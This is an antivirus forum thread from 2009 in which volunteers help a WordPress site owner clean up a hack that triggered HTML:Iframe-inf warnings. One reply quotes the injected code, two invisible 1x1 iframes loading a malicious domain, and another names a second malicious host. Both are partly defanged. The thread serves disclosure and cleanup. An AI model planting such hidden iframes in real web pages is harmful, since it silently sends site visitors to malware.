Author Topic: HTML:Iframe-inf Virus on my webpage  (Read 8154 times)

0 Members and 1 Guest are viewing this topic.

Offline capitolcomp

  • Newbie
  • *
  • Posts: 2
HTML:Iframe-inf Virus on my webpage
« on: May 11, 2009, 12:04:45 AM »
Hello virus guru's, I have a recent problem with my wordpress webpage/blog.  I have not made any changes all of last week, but yesterday I started getting Iframe-inf virus warnings when I try to browse to my webpage, or the admin page.
My wordpress is up to date, and I have disabled all the plugins, but I still have the same problem.
My web address is http://www.capitolcomputing.com , yeah I know I try to fix computers for a living, and I got a virus, but any help would be appreciated.

If it helps my Avast VPS version is 090510-0, 05/10/2009

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83756
  • No support PMs thanks
Re: HTML:Iframe-inf Virus on my webpage
« Reply #1 on: May 11, 2009, 12:17:02 AM »
I would ensure that you have the latest version of WordPress as old versions are vulnerable to this type of exploit as are other content management software. You should also change any passwords for ftp, control panel or content management software.

Your site has been hacked that page has had two hidden iframe (on a single line) inserted into the page source after the closing HTML tag, see image.

Please modify your post changing the link from http to hXXp to avoid accidental exposure
« Last Edit: May 11, 2009, 12:24:32 AM by DavidR »
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 2004 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.7.2425 (build 20.7.5568.595) UI-1.0.558/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro

Offline MonsterKat

  • Newbie
  • *
  • Posts: 14
Re: HTML:Iframe-inf Virus on my webpage
« Reply #2 on: May 11, 2009, 12:18:43 AM »
I just had the exact same issue, and the lovely team here helped me out well. :) It happened early this afternoon and as of now my site is all cleaned.

Best of luck!

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83756
  • No support PMs thanks
Re: HTML:Iframe-inf Virus on my webpage
« Reply #3 on: May 11, 2009, 12:26:01 AM »
You can find MonsterKat's topic here, http://forum.avast.com/index.php?topic=45133.0, some useful information from his Host.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 2004 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.7.2425 (build 20.7.5568.595) UI-1.0.558/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32688
  • malware fighter
Re: HTML:Iframe-inf Virus on my webpage
« Reply #4 on: May 11, 2009, 11:33:04 PM »
Hi capitolcomp.

This was what Blacklist Doctor found, and why it blacklisted the site:
Code: [Select]
<iframe src="hxtp://niklejo.net/?click=ADBC80" width=1 height=1 style="visibility:hidden;position:absolute"> <iframe src="hxtp://niklejo.net/?click=A9EB25" width=1 height=1 style="visibility:hidden;position:absolute">
[/code/

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline capitolcomp

  • Newbie
  • *
  • Posts: 2
Re: HTML:Iframe-inf Virus on my webpage
« Reply #5 on: May 12, 2009, 09:26:28 AM »
After looking into the issues you mentioned I deleted the references to the offending site from the Main index template within Wordpress.  I also removed all other themes as it seems they had the same problem, and I'm not using them.  Also I am already running the latest version of WP 2.7.1, and changed my passwords. 
I felt that would put an end to the problem but I still have the same problem, and following what one post said I tried using Blacklist Doctor, and it said the problem was still there.
Could anyone help determine my next course of action, currently I'm downloading my files by ftp so I can run a scan on them. Keep in mind that I am not web savvy, but great with computers otherwise.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 83756
  • No support PMs thanks
Re: HTML:Iframe-inf Virus on my webpage
« Reply #6 on: May 12, 2009, 04:01:53 PM »
I have just revisited the site and there is a 1x1 hidden iframe pointing at hXXp://klaomta.com which according to a whois is in Slovenia (Telekom Slovenije d.d.). I think that is what avast is alerting on.

This is the very last link of the page source, masquerading as a navlink ???

So it looks like there is something there still being injected into posts, have you checked your template files, index, etc. as they are frequently infected too.

If you haven't sought advice from your Host, that really should be your first port of call.
WinXP ProSP3/ Core2Duo E8300/ 4GB Ram/ avast! free 18.5.2342/ Firefox ESR, uBlock Origin, uMatrix/ MailWasher Pro7.11.0/ DropMyRights/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security
Windows 10 Home 2004 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 20.7.2425 (build 20.7.5568.595) UI-1.0.558/ WinPatrol+/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro